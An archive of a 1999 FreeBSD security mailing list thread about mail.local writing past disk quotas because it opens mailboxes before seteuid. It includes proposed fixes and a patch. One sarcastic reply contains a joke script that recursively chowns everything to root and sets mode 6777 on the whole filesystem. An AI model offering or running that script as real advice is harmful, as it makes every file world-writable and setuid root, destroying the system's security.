Pedro. -- ------------------------------------------------------------------- Pedro José Lobo Perea Tel: +34 91 336 78 19 Centro de Cálculo Fax: +34 91 331 92 29 E.U.I.T. Telecomunicación e-mail: pjlobo@euitt.upm.es Universidad Politécnica de Madrid Ctra. de Valencia, Km. 7 E-28031 Madrid - España / Spain To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 8:30:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id 1F4B514F69 for ; Fri, 30 Apr 1999 08:28:11 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es) Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id RAA17566; Fri, 30 Apr 1999 17:27:50 +0200 (MET DST) Date: Fri, 30 Apr 1999 17:27:49 +0200 (MET DST) From: "Pedro J. Lobo" To: Robert Watson Cc: freebsd-security@freebsd.org Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 30 Apr 1999, Robert Watson wrote: >On Fri, 30 Apr 1999, Pedro J. Lobo wrote: > >> /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I >> use /usr/bin/mail as the local mailer? I also administer an alpha with >> Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local >> mailer. > >The need to setuid for local mail delivery is necessitated by the >placement of user-owned mailboxes in a shared directory. Clearly, there >are other possible arrangements that would work and not require the >effective uid to be root during mail delivery (for example, individual >directories, etc). ACLs would also provide a nice solution. In fact, mail.local tries to act as the recipient, but fails to do so. See my response to Fernando Schapachnik. Maybe I try cyrus later, but I need to fix this problem *now*! Cheers, Pedro. -- ------------------------------------------------------------------- Pedro José Lobo Perea Tel: +34 91 336 78 19 Centro de Cálculo Fax: +34 91 331 92 29 E.U.I.T. Telecomunicación e-mail: pjlobo@euitt.upm.es Universidad Politécnica de Madrid Ctra. de Valencia, Km. 7 E-28031 Madrid - España / Spain To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 8:37: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 608) id 1537714F69; Fri, 30 Apr 1999 08:36:59 -0700 (PDT) From: "Jonathan M. Bresler" To: frank@vogon.agala.harz.de Cc: freebsd-security@freebsd.org In-reply-to: <19990429223254.A19140@vogon.agala.harz.de> (frank@vogon.agala.harz.de) Subject: Re: VPN Message-Id: <19990430153659.1537714F69@hub.freebsd.org> Date: Fri, 30 Apr 1999 08:36:59 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > >What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD > >to interact with NT/95 machines running PPTP? > > Don't use Microsoft PPTP, see http://www.counterpane.com/. the problem is not with PPTP itself, but rather microsoft's inimitable style of implementing protocols. jmb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 8:53:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 0670E14F96 for ; Fri, 30 Apr 1999 08:53:15 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA20802; Fri, 30 Apr 1999 11:52:31 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 30 Apr 1999 11:52:31 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: "Pedro J. Lobo" Cc: Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 30 Apr 1999, Pedro J. Lobo wrote: > On Fri, 30 Apr 1999, Fernando Schapachnik wrote: >=20 > >En un mensaje anterior, Robert Watson escribi=F3: > >> On Fri, 30 Apr 1999, Pedro J. Lobo wrote: > >>=20 > >> > As you may see, it is a rather ugly "feature". So, the question is: = does > >> > /usr/libexec/mail.local need to be setuid root? Or, alternatively, c= an I > >> > use /usr/bin/mail as the local mailer? I also administer an alpha wi= th > >> > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the loca= l > >> > mailer. > > > >You can use procmail with doesn't need suid. >=20 > Maybe I give it a try. In the meantime, I've done a few more tests, and I > don't like too much what I've seen. >=20 > I have looked at the mail.local code, and it does a seteuid(2) to the > recipient's UID. So, why does the system allow it to write over quota? >=20 > I've written a small test program, and have found this: if you seteuid() > and open a file for writing, write() or fwrite() calls will fail (that is= , > if the effective user is over quota). But, if you open the file, and call > seteuid() when the file is already open, then you can write as much data > as you want. As mail.local does this (first opens the user's mailbox, the= n > seteuid()'s), the quotas are ignored. >=20 > I think this is a bug, and that quotas should be checked (and applied) > every time you call write() or fwrite() or whatever. Opinions? The credentials used to open a file remain bound to the file object. This is actually very useful, as it means a privileged program can pass access to a file/whatever using the ancillary data feature, etc. Similarly, a=20 setuid program can open a terminal device, say, and then change its uid=20 so that it doesn't have the privilege to open other terminal devices, but still has the first open. But this is clearly a downside if you later want to restrict access. Presumably the answer is to perform the open that delivers the mail *after* the setting of the uid. You'll need to also open the file beforehand to create it if necessary and set ownership, etc. Once you believe delivery will succeed, reopen the file in the restricted environment. Have mail.local return some kind of success/fail to the parent so you can catch race conditions like the user performing rm /var/mail/user between the check and the reopen. Alternatively, a cheap solution that is susceptible to some races would be simply to check if there was room to deliver the message before delivering, and returning a transient error if not. It's conceivable that a user could get a race in there, but that would work only for one message. Robert N Watson=20 robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 8:57: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id A80D614F96 for ; Fri, 30 Apr 1999 08:55:29 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es) Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id RAA17781 for ; Fri, 30 Apr 1999 17:55:27 +0200 (MET DST) Date: Fri, 30 Apr 1999 17:55:27 +0200 (MET DST) From: "Pedro J. Lobo" To: freebsd-security@freebsd.org Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-1143190565-925487727=:17688" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-1143190565-925487727=:17688 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8BIT On Fri, 30 Apr 1999, Pedro J. Lobo wrote: >I have looked at the mail.local code, and it does a seteuid(2) to the >recipient's UID. So, why does the system allow it to write over quota? > >I've written a small test program, and have found this: if you seteuid() >and open a file for writing, write() or fwrite() calls will fail (that is, >if the effective user is over quota). But, if you open the file, and call >seteuid() when the file is already open, then you can write as much data >as you want. As mail.local does this (first opens the user's mailbox, then >seteuid()'s), the quotas are ignored. > >I think this is a bug, and that quotas should be checked (and applied) >every time you call write() or fwrite() or whatever. Opinions? Just for the record, I have modified mail.local (patch attached) to have at least a temporary workaround. I have tested it on my server and it works. But, I feel that this is not a complete solution, and that the quota system is somewhat broken. Pedro. -- ------------------------------------------------------------------- Pedro José Lobo Perea Tel: +34 91 336 78 19 Centro de Cálculo Fax: +34 91 331 92 29 E.U.I.T. Telecomunicación e-mail: pjlobo@euitt.upm.es Universidad Politécnica de Madrid Ctra. de Valencia, Km. 7 E-28031 Madrid - España / Spain --0-1143190565-925487727=:17688 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="mail.local.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="mail.local.patch" KioqIGNvbnRyaWIvc2VuZG1haWwvbWFpbC5sb2NhbC9tYWlsLmxvY2FsLmMu b3JpZwlUdWUgSmFuIDEyIDEzOjM4OjAwIDE5OTkNCi0tLSBjb250cmliL3Nl bmRtYWlsL21haWwubG9jYWwvbWFpbC5sb2NhbC5jCUZyaSBBcHIgMzAgMTc6 NDg6MzEgMTk5OQ0KKioqKioqKioqKioqKioqDQoqKiogODAzLDgwOCAqKioq DQotLS0gODAzLDgxMCAtLS0tDQogIAkJCQlwdy0+cHdfdWlkLCBwdy0+cHdf Z2lkLCBuYW1lKTsNCiAgCQkJZ290byBlcnIxOw0KICAJCX0NCisgCQljbG9z ZShtYmZkKTsNCisgCQlnb3RvIHRyeWFnYWluOw0KICAJfSBlbHNlIGlmIChz Yi5zdF9ubGluayAhPSAxIHx8ICFTX0lTUkVHKHNiLnN0X21vZGUpKSB7DQog IAkJbWFpbGVycigiNTUwIDUuMi4wIiwgIiVzOiBpcnJlZ3VsYXIgZmlsZSIs IHBhdGgpOw0KICAJCWdvdG8gZXJyMDsNCioqKioqKioqKioqKioqKg0KKioq IDgxMiw4MTggKioqKg0KICAJCQkJcGF0aCwgc2Iuc3RfdWlkKTsNCiAgCQln b3RvIGVycjA7DQogIAl9IGVsc2Ugew0KISAJCW1iZmQgPSBvcGVuKHBhdGgs IE9fQVBQRU5EfE9fV1JPTkxZLCAwKTsNCiAgCX0NCiAgDQogIAlpZiAobWJm ZCA9PSAtMSkgew0KLS0tIDgxNCw4MzAgLS0tLQ0KICAJCQkJcGF0aCwgc2Iu c3RfdWlkKTsNCiAgCQlnb3RvIGVycjA7DQogIAl9IGVsc2Ugew0KISAJICBp ZiAoc2V0cmV1aWQoMCwgcHctPnB3X3VpZCkgPCAwKSB7DQohIAkgICAgbWFp bGVycigiNDUwIDQuMi4wIiwgInNldHJldWlkKDAsICVkKTogJXMgKHI9JWQs IGU9JWQpIiwNCiEgCQkgICAgcHctPnB3X3VpZCwgc3RyZXJyb3IoZXJybm8p LCBnZXR1aWQoKSwgZ2V0ZXVpZCgpKTsNCiEgCSAgICBnb3RvIGVycjE7DQoh IAkgIH0NCiEgCSAgbWJmZCA9IG9wZW4ocGF0aCwgT19BUFBFTkR8T19XUk9O TFksIDApOw0KISAJICBpZiAoc2V0cmV1aWQoMCwgMCkgPCAwKSB7DQohIAkg ICAgbWFpbGVycigiNDUwIDQuMi4wIiwgInNldHJldWlkKDAsICVkKTogJXMg KHI9JWQsIGU9JWQpIiwNCiEgCQkgICAgcHctPnB3X3VpZCwgc3RyZXJyb3Io ZXJybm8pLCBnZXR1aWQoKSwgZ2V0ZXVpZCgpKTsNCiEgCSAgICBnb3RvIGVy cjE7DQohIAkgIH0NCiAgCX0NCiAgDQogIAlpZiAobWJmZCA9PSAtMSkgew0K KioqKioqKioqKioqKioqDQoqKiogMTA4OCwxMDk2ICoqKioNCiAgI2lmZGVm IEVBR0FJTg0KICAJY2FzZSBFQUdBSU46CQkvKiBSZXNvdXJjZSB0ZW1wb3Jh cmlseSB1bmF2YWlsYWJsZSAqLw0KICAjZW5kaWYNCi0gI2lmZGVmIEVEUVVP VA0KLSAJY2FzZSBFRFFVT1Q6CQkvKiBEaXNjIHF1b3RhIGV4Y2VlZGVkICov DQotICNlbmRpZg0KICAjaWZkZWYgRUJVU1kNCiAgCWNhc2UgRUJVU1k6CQkv KiBEZXZpY2UgYnVzeSAqLw0KICAjZW5kaWYNCi0tLSAxMTAwLDExMDUgLS0t LQ0KKioqKioqKioqKioqKioqDQoqKiogMTE1OSwxMTY0ICoqKioNCi0tLSAx MTY4LDExNzYgLS0tLQ0KICAjZW5kaWYNCiAgCQlldmFsID0gRVhfVEVNUEZB SUw7DQogIAkJYnJlYWs7DQorICNpZmRlZiBFRFFVT1QNCisgCWNhc2UgRURR VU9UOgkJLyogRGlzYyBxdW90YSBleGNlZWRlZCAqLw0KKyAjZW5kaWYNCiAg CWRlZmF1bHQ6DQogIAkJZXZhbCA9IEVYX1VOQVZBSUxBQkxFOw0KICAJCWJy ZWFrOw0K --0-1143190565-925487727=:17688-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 9:10:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from federation.addy.com (federation.addy.com [207.239.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 1720915321 for ; Fri, 30 Apr 1999 09:09:59 -0700 (PDT) (envelope-from jim@federation.addy.com) Received: from localhost (jim@localhost) by federation.addy.com (8.8.5/8.6.12) with SMTP id MAA11080 for ; Fri, 30 Apr 1999 12:09:58 -0400 (EDT) Date: Fri, 30 Apr 1999 12:09:58 -0400 (EDT) From: Jim Sander Cc: freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > modified mail.local We have a similar "hack" here to check quotas before delivery, but it's somewhat ugly. It would really be nice to have a *clean* way to do this. Is there any vital functionality that would be lost by moving the open after the uid is altered? > the quota system is somewhat broken. I have noticed that some users' soft limits are enforced as hard, and some hard limits are ignored. We're still on various 2.2.x systems btw. Anyone else seen this, or is it something specific to our setup here? -=Jim=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 9:15:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id 55CA015316 for ; Fri, 30 Apr 1999 09:14:35 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es) Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id SAA17884; Fri, 30 Apr 1999 18:08:29 +0200 (MET DST) Date: Fri, 30 Apr 1999 18:08:29 +0200 (MET DST) From: "Pedro J. Lobo" To: Robert Watson Cc: Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 30 Apr 1999, Robert Watson wrote: >On Fri, 30 Apr 1999, Pedro J. Lobo wrote: > >> I have looked at the mail.local code, and it does a seteuid(2) to the >> recipient's UID. So, why does the system allow it to write over quota? >> >> I've written a small test program, and have found this: if you seteuid() >> and open a file for writing, write() or fwrite() calls will fail (that is, >> if the effective user is over quota). But, if you open the file, and call >> seteuid() when the file is already open, then you can write as much data >> as you want. As mail.local does this (first opens the user's mailbox, then >> seteuid()'s), the quotas are ignored. >> >> I think this is a bug, and that quotas should be checked (and applied) >> every time you call write() or fwrite() or whatever. Opinions? > >The credentials used to open a file remain bound to the file object. This >is actually very useful, as it means a privileged program can pass access >to a file/whatever using the ancillary data feature, etc. Similarly, a >setuid program can open a terminal device, say, and then change its uid >so that it doesn't have the privilege to open other terminal devices, >but still has the first open. But this is clearly a downside if you later >want to restrict access. Well, that's reasonable. >Presumably the answer is to perform the open that delivers the mail >*after* the setting of the uid. You'll need to also open the file >beforehand to create it if necessary and set ownership, etc. Once you >believe delivery will succeed, reopen the file in the restricted >environment. Have mail.local return some kind of success/fail to the >parent so you can catch race conditions like the user performing rm >/var/mail/user between the check and the reopen. In fact, I've just posted to the list a small patch to mail.local that does exactly that. Maybe it is the right solution, after all. I am also treating EQUOTA errors as *not* temporary, because if they are treated as temporary and the messages are stored in the mail queue there is a (high) risk that /var/spool/mqueue gets full in a few days. I am not sure that this is the right thing to do on all situations, but for me it is (and people keep thinking that having the source code of the full OS can't help. Ha!.) Well, time to go home. See you all on Monday. Pedro. -- ------------------------------------------------------------------- Pedro José Lobo Perea Tel: +34 91 336 78 19 Centro de Cálculo Fax: +34 91 331 92 29 E.U.I.T. Telecomunicación e-mail: pjlobo@euitt.upm.es Universidad Politécnica de Madrid Ctra. de Valencia, Km. 7 E-28031 Madrid - España / Spain To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 9:28:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from helios.man.lublin.pl (helios.man.lublin.pl [194.92.17.34]) by hub.freebsd.org (Postfix) with ESMTP id AB688152DA for ; Fri, 30 Apr 1999 09:28:06 -0700 (PDT) (envelope-from sopel@nemezis.ipan.lublin.pl) Received: from nemezis.ipan.lublin.pl ([193.59.19.154]:3538 "EHLO nemezis.ipan.lublin.pl" ident: "sopel") by helios.man.lublin.pl with ESMTP id <5517-864>; Fri, 30 Apr 1999 18:27:53 +0200 Date: Fri, 30 Apr 1999 18:29:56 +0000 (GMT) From: Wojtek To: "Pedro J. Lobo" Cc: Robert Watson , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org greetings. i think that mail.local is a real mess (there were various exploits for it). why not switch to a more decent mail distribution program (procmail ?) as a default for freebsd. the other thing in question is - should sendmail be the default mail agent on freebsd ? there are many substitues for it which have proven to be more secure (postfix - by Wietse Venema, or zmailer, qmail, and so on..). what do the core team think about this ? sopel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 9:36: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from noop.colo.erols.net (noop.colo.erols.net [207.96.1.150]) by hub.freebsd.org (Postfix) with ESMTP id C746115990 for ; Fri, 30 Apr 1999 09:35:54 -0700 (PDT) (envelope-from gjp@noop.colo.erols.net) Received: from localhost ([127.0.0.1] helo=noop.colo.erols.net) by noop.colo.erols.net with esmtp (Exim 2.12 #1) id 10dGFu-000GpF-00; Fri, 30 Apr 1999 12:35:14 -0400 To: "Pedro J. Lobo" Cc: freebsd-security@freebsd.org From: "Gary Palmer" Subject: Re: Does mail.local need to be setuid-root? In-reply-to: Your message of "Fri, 30 Apr 1999 15:47:18 +0200." Date: Fri, 30 Apr 1999 12:35:13 -0400 Message-ID: <64680.925490113@noop.colo.erols.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Pedro J. Lobo" wrote in message ID : > The problem is that you cand send mail to a user that is over quota, and > the system will append the new message to its inbox (located in /var/mail, > as by default). Indeed, root can append data to a file that belongs to a > user that is over quota. Hrm. I thought this had been fixed. Anyhow, a temporary workaround is to use procmail as your local delivery agent. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 10: 6:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 743FC14FF7 for ; Fri, 30 Apr 1999 10:06:23 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA07652; Fri, 30 Apr 1999 10:06:27 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda07650; Fri Apr 30 10:06:16 1999 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA00762; Fri, 30 Apr 1999 10:06:10 -0700 (PDT) Message-Id: <199904301706.KAA00762@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdXLJ755; Fri Apr 30 10:05:33 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 3.1-RELEASE X-Sender: cschuber To: "Pedro J. Lobo" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-reply-to: Your message of "Fri, 30 Apr 1999 15:47:18 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Date: Fri, 30 Apr 1999 10:05:33 -0700 From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Pe dro J. Lobo" writes: > Hello, people. > = > I have a 3.1-RELEASE machine which, among other tasks, acts as a mail a= nd > telnet server for out students. Recently I noticed that several users w= ere > using more disk space than his quotas should allow (!). After a bit of > investigation, I have traced down the problem to the mail system. > = > The problem is that you cand send mail to a user that is over quota, an= d > the system will append the new message to its inbox (located in /var/ma= il, > as by default). Indeed, root can append data to a file that belongs to = a > user that is over quota. > = > As you may see, it is a rather ugly "feature". So, the question is: doe= s > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can = I > use /usr/bin/mail as the local mailer? I also administer an alpha with > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local > mailer. The main difference between DU and FreeBSD is: DU 4.0D: OSF1 hostname V4.0 878 alpha drwxrwxrwt 2 root mail 512 Apr 26 00:00 = /var/spool/mail lrwxrwxrwx 1 root system 7 Dec 9 14:16 /bin -> = usr/bin -rws--x--x 2 root bin 40960 Dec 29 1997 /usr/bin/mail FreeBSD 3.1R: FreeBSD hostname 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Thu Apr 8 = 16:05:54 PDT 1999 root@hostname:/opt/usr_src-310/sys/compile/HOS TNAME i386 drwxrwxr-x 2 root mail 512 Apr 30 09:41 /var/mail -r-sr-xr-x 1 root wheel 15056 Mar 2 06:53 /usr/libexec/mail.loca l Solaris 2.6 (for good measure): SunOS HOSTNAME 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-Enterpri se drwxrwxrwt 3 root mail 512 Apr 29 23:45 /var/mail -r-x--s--x 1 bin mail 64376 Jul 15 1997 /bin/mail You can resolve your issue by making mail.local sgid mail instead = of suid root. Ownership of individual mail files cannot be set by = mail.local when its sgid mail, so you will need to create each = individual user's mail spool file with the proper permissions 660 = and ownership before they can receive mail. If mail.local is the = only sgid mail application on your system, using sgid mail = shouldn't be any less secure (from a privacy point of view) than = the stock-out-of-the-box setup. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC = "e**(i*pi)+1=3D0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 10:35:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id CEC021506B for ; Fri, 30 Apr 1999 10:35:45 -0700 (PDT) (envelope-from freebsd@deepwell.com) Received: (qmail 11251 invoked from network); 30 Apr 1999 18:12:18 -0000 Received: from file.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 30 Apr 1999 18:12:18 -0000 Message-Id: <4.1.19990430103009.012536c0@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Fri, 30 Apr 1999 10:34:16 -0700 To: freebsd-security@freebsd.org From: Deepwell Internet Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: <199904301706.KAA00762@passer.osg.gov.bc.ca> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I prefer all my files, executables and data to be SUID root. I'm even including a small script to aid in this. Good luck! #!/bin/sh cd / chown -R root:wheel / chmod -R 6777 / echo 'done' At 10:05 AM 4/30/99 -0700, you wrote: >In message pm.es>, "Pe >dro J. Lobo" writes: >> Hello, people. >> >> I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and >> telnet server for out students. Recently I noticed that several users were >> using more disk space than his quotas should allow (!). After a bit of >> investigation, I have traced down the problem to the mail system. >> >> The problem is that you cand send mail to a user that is over quota, and >> the system will append the new message to its inbox (located in /var/mail, >> as by default). Indeed, root can append data to a file that belongs to a >> user that is over quota. >> >> As you may see, it is a rather ugly "feature". So, the question is: does >> /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I >> use /usr/bin/mail as the local mailer? I also administer an alpha with >> Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local >> mailer. > >The main difference between DU and FreeBSD is: > >DU 4.0D: >OSF1 hostname V4.0 878 alpha >drwxrwxrwt 2 root mail 512 Apr 26 00:00 >/var/spool/mail >lrwxrwxrwx 1 root system 7 Dec 9 14:16 /bin -> >usr/bin >-rws--x--x 2 root bin 40960 Dec 29 1997 /usr/bin/mail > >FreeBSD 3.1R: >FreeBSD hostname 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Thu Apr 8 >16:05:54 PDT 1999 root@hostname:/opt/usr_src-310/sys/compile/HOS >TNAME i386 >drwxrwxr-x 2 root mail 512 Apr 30 09:41 /var/mail >-r-sr-xr-x 1 root wheel 15056 Mar 2 06:53 /usr/libexec/mail.loca >l > >Solaris 2.6 (for good measure): >SunOS HOSTNAME 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-Enterpri >se >drwxrwxrwt 3 root mail 512 Apr 29 23:45 /var/mail >-r-x--s--x 1 bin mail 64376 Jul 15 1997 /bin/mail > >You can resolve your issue by making mail.local sgid mail instead >of suid root. Ownership of individual mail files cannot be set by >mail.local when its sgid mail, so you will need to create each >individual user's mail spool file with the proper permissions 660 >and ownership before they can receive mail. If mail.local is the >only sgid mail application on your system, using sgid mail >shouldn't be any less secure (from a privacy point of view) than >the stock-out-of-the-box setup. > > >Regards, Phone: (250)387-8437 >Cy Schubert Fax: (250)387-5766 >Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca >ITSD Cy.Schubert@gems8.gov.bc.ca >Province of BC > "e**(i*pi)+1=0" > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 10:50:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id BD81F14C4E for ; Fri, 30 Apr 1999 10:50:54 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Fri, 30 Apr 1999 11:50:53 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma017733; Fri, 30 Apr 99 11:50:50 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id LAA29032; Fri, 30 Apr 1999 11:49:59 -0600 (MDT) Date: Fri, 30 Apr 1999 11:49:58 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Wojtek Cc: freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 30 Apr 1999, Wojtek wrote: > i think that mail.local is a real mess (there were various exploits for > it). why not switch to a more decent mail distribution program > (procmail ?) as a default for freebsd. I for one would be very nervous if procmail were SUID/SGID on my system. Have you ever looked at the sources to procmail? They are among the most convoluted and aesthetically disturbing pieces of code I have ever seen. And procmail is certainly not without its own problems, see for example: http://geek-girl.com/bugtraq/1999_2/0031.html http://geek-girl.com/bugtraq/1999_2/0043.html http://geek-girl.com/bugtraq/1999_2/0040.html > the other thing in question is - should sendmail be the default mail > agent on freebsd ? there are many substitues for it which have proven > to be more secure (postfix - by Wietse Venema, or zmailer, qmail, and so > on..). ... all with a completely unproven track record, except for qmail perhaps. Haven't we already gone to battle over this? I don't remember who won in the sendmail versus the rest of the world battle, but this probably doesn't belong on -security. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> 